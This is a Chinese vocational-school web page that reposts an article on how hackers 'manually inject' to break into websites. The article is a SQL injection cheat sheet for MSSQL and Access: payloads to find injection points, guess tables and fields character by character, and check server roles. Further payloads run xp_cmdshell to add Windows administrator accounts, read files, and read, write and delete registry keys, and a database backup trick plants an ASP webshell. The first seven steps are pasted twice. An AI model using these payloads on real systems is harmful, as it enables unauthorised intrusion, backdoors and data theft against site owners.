看看黑客如何手工注入方法入侵网站的

不仅仅统招学历哟

热门专业！
大学校园！
就业保障！
拿学历又能高薪就业，谁能不爱！

了解详情>

让每一个家庭“安心”、“放心”

教学为本
师爱为魂
安心学习
放心就业

了解详情>

深耕细作IT职业教育15载

青鸟之星教学质量大奖
卓越风云人物
北大青鸟中心理事会成员
七项荣耀载誉而行！

了解详情>

我们教学怎么样

实力见证
网络组一等奖
网络组二等奖
软件组四等奖
200家校区脱颖而出！

了解更多>

北大青鸟职业IT20周年

重承诺
守信用
放心品牌
放心学习
靠靠谱谱好就业！

了解更多>

我命由我不由天

学个性的技术
做爱做的事
挣满意的钱
衣食无忧
选择宽且高大尚！

了解更多>

我们靠不靠谱

14年办学
14年磨练
14年成长
14年探索
只为让每个学员成材！

了解更多>

不打工也牛掰

好工作
好环境
高薪资
好课程
支持你成为有“钱”人！

了解更多>

学IT就读北大青鸟

好工作
好未来
好老师
好课程
支持你成为受人尊敬的人！

了解更多>

网络技术服务器管理数据库网络安全

作者：北大青鸟添加时间：04-01 浏览次数：0

我们在入侵网站的时候，有时候直接靠工具是无法找到注入点的，所以很多时候都要用到手工注入，下面列举一些方法：

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ”=’

4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ”=’

4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’

5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）

;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–

;and 1=(select IS_MEMBER(‘db_owner’));–

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;–

;exec master.dbo.sp_password null,username,password;–

;exec master.dbo.sp_addsrvrolemember sysadmin username;–

;exec master.dbo.xp_cmdshell ‘net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–

;exec master.dbo.xp_cmdshell ‘net user username password /add’;–

;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ‘c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–

;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 获得所有子目录的目录树构

;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread

‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’ 删除某个值

xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’c:\l.asp’;

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’g:\wwwtest\l.asp’;

文章由郑州北大青鸟搜集整理，转载请注明！

本文由站河南北大青鸟校区整编而成，如需了解更多IT资讯类的文章、新闻、课程和学习技巧、就业案例、招生详情等问题，可以对在线咨询老师进行一对一问答！

热点资讯

选择靠谱的学校

入学测试与试听

体验之后再决定

决定之后要努力

支持你受人尊敬

联系电话：400-638-3521/
值班热线：15225191462(手机)

学校介绍: 中心简介; 青鸟概况; 乘车路线; 校区环境

相关课程: Benet课程; ACCP课程; 软件课程; 安卓课程

校区新闻: 校区新闻; 就业新闻; 行业新闻; 媒体新闻; 招生解答

学员就业: 就业明星; 就业感言; 求职技巧

技术交流: 网络技术; 服务器管理; 数据库; 网络安全

精彩专题: 高中生专区; 大学生专区; 跳槽转行区; 自考生专区

郑州北大青鸟翔天信鸽软件学院地址：郑州市文化路90号河南财经政法大学文南校区1号教学楼网站地图乘车路线 - 联系我们 - 网站RSS - 河南北大青鸟招聘

豫ICP备10022989号-1 办学许可证号：1601035000013 豫公网安备 41010502002899号

分享到：

看看黑客如何手工注入方法入侵网站的

推荐资讯

热点资讯